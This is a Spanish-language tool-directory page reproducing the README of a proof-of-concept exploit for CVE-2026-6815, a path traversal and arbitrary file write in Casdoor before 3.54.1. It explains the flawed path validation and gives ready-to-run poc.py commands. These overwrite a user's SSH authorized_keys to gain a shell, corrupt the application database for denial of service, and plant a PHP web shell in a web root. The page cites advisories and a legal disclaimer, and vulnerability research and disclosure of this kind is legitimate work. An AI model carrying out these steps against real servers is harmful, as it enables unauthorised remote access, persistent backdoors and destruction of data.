Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-6815 — Exploit PoC de recorrido de ruta autenticado y escritura arbitraria de archivos para Casdoor <3.54.1, que permite RCE mediante inyección de clave SSH, carga de web shell o DoS persistente a través de corrupción de base de datos. | Kitploit
Herramientas/GitHubGitHub/danilo-dellorco/cve-2026-6815
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubdanilo-dellorco/cve-2026-6815

CVE-2026-6815

Exploit PoC de recorrido de ruta autenticado y escritura arbitraria de archivos para Casdoor <3.54.1, que permite RCE mediante inyección de clave SSH, carga de web shell o DoS persistente a través de corrupción de base de datos.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
22hace 2 mesesAún no revisado
Compartir

CVE-2026-6815 PoC/Exploit: Casdoor <3.54.1 Path Traversal y Escritura Arbitraria de Archivos (Autenticado)

Este repositorio contiene una prueba de concepto (PoC) para el exploit CVE-2026-6815, una vulnerabilidad de escritura arbitraria de archivos y path traversal en Casdoor.

La vulnerabilidad ha sido corregida en la versión 3.54.1.

Requisitos

El atacante debe estar autenticado en la instancia de Casdoor con privilegios de administrador o un usuario equivalente con acceso para crear y/o editar proveedores de almacenamiento.

Impacto

  • Ejecución Remota de Código (RCE): Escribiendo en ubicaciones sensibles como .ssh/authorized_keys, crontabs o raíces web.
  • Denegación de Servicio (DoS): Sobrescribiendo bases de datos de la aplicación (casdoor.db) o binarios principales con archivos arbitrarios, deteniendo inmediatamente la aplicación.

Detalles Técnicos

Casdoor permite a los administradores configurar proveedores de almacenamiento. El proveedor de Sistema de Archivos Local no sanea correctamente la configuración pathPrefix ni el parámetro fullFilePath durante las cargas de recursos.

Mediante secuencias de traversal de directorios (../), un administrador autenticado puede escapar del directorio de almacenamiento dedicado y escribir archivos en cualquier lugar donde el proceso de Casdoor tenga permisos.

La vulnerabilidad se origina en una validación insuficiente de rutas en:

  • object/provider.go: Sin validación en pathPrefix durante la creación/actualización.
  • storage/local_file_system.go: El método GetFullPath no verifica si la ruta resuelta permanece dentro del sandbox previsto.

Uso

  1. Instalar dependencias:

    root@kitploit:~
    pip install -r requirements.txt
    
  2. Ejecutar el exploit:

    root@kitploit:~
    python3 poc.py --url http://target:8000 --file local_file --rpath /home/casdoor/new_remote_file
    

Ejemplos de Uso

1. Inyección de Clave SSH para RCE

Escribir una clave pública controlada por el atacante en el archivo authorized_keys del usuario casdoor para obtener acceso SSH.

Generar la clave ssh:

root@kitploit:~
ssh-keygen -f casdoor_rce

Sobrescribir authorized_keys con la clave pública generada:

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file casdoor_rce.pub --rpath /home/casdoor/.ssh/authorized_keys

Obtener shell SSH en el host remoto usando la clave privada:

root@kitploit:~
ssh -i ./casdoor_rce casdoor@target

2. DoS Persistente (Corrupción de Base de Datos)

Sobrescribir el archivo de base de datos local de la aplicación (ej., casdoor.db) para causar una denegación de servicio.

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file dummy.txt --rpath /app/casdoor.db

3. Subida de Web Shell (Raíz Web Secundaria)

Si el servidor está alojando un servidor web secundario (ej., Apache/Nginx) en el mismo sistema de archivos, escribir un web shell en su raíz de documentos.

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file shell.php --rpath /var/www/html/shell.php

4. Organización y Aplicación Personalizadas

Si tienes credenciales administrativas para una organización y aplicación específicas (distintas de los valores predeterminados built-in y app-built-in), especifícalas usando --orgname y --appname.

root@kitploit:~
python3 poc.py --url http://target:8000 --usr custom_admin --psw P@ssw0rd --orgname my-org --appname my-app --file local_file.txt --rpath /tmp/pwned.txt

Referencias

  • CERT/CC Vulnerability Note VU#937808
  • CVE-2026-6815 on CVE.org
  • Red Hat Security Advisory: CVE-2026-6815

Aviso Legal

Este software es solo para fines educativos y de pruebas de seguridad autorizadas. El autor no se responsabiliza por el mal uso de esta información.

Autor

Vulnerabilidad descubierta y PoC desarrollada por Danilo Dell'Orco (sixpain).

Descargar herramienta